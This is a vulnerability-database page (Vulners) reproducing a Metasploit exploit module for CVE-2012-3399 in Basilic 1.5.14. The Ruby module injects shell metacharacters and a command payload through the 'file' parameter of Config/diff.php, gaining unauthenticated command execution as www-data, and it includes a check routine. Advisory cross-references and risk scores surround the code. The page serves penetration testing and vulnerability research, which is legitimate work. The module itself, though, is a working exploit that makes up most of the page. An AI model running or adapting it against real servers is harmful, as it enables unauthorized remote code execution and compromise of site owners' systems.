Vulners
Lucene search
Basilic 1.5.14 diff.php Arbitrary Command Execution
🗓️ 06 Jul 2012 06:41:34Reported by lcashdollar, sinn3r <[email protected]>, juan vazquez <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 32 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Basilic diff.php Command Injection | 5 Jul 201200:00 | – | nessus |
 | CVE-2012-3399 | 9 Jul 201200:00 | – | circl |
 | Basilic diff.php Arbitrary Command Execution (CVE-2012-3399) | 7 Jul 201300:00 | – | checkpoint_advisories |
 | CVE-2012-3399 | 12 Jul 201219:00 | – | cve |
 | CVE-2012-3399 | 12 Jul 201219:00 | – | cvelist |
 | Basilic 1.5.14 RCE | 8 Feb 201300:00 | – | dsquare |
 | CVE-2012-3399 | 12 Jul 201219:55 | – | nvd |
 | Design/Logic Flaw | 12 Jul 201219:55 | – | prion |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
'Description' => %q{
This module abuses a metacharacter injection vulnerability in the
diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
commands as the www-data user account.
},
'Author' =>
[
'lcashdollar',
'sinn3r',
'juan vazquez'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-3399' ],
[ 'OSVDB', '83719' ],
[ 'BID', '54234' ]
],
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python telnet'
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2012-06-28'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
])
end
def check
base = normalize_uri(target_uri.path)
sig = rand_text_alpha(10)
res = send_request_cgi({
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => sig,
'new' => '1',
'old' => '2'
}
})
if res and res.code == 200 and res.body =~ /#{sig}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Sending GET request...")
base = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => "&#{payload.encoded} #",
'new' => '1',
'old' => '2'
}
})
if res and res.code == 404 then
print_error("404 Basilic not installed or possibly check URI Path.")
else
vprint_line("Server returned #{res.code}")
end
handler
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
0.9Low risk
Vulners AI Score0.9
CVSS 27.5
EPSS0.65321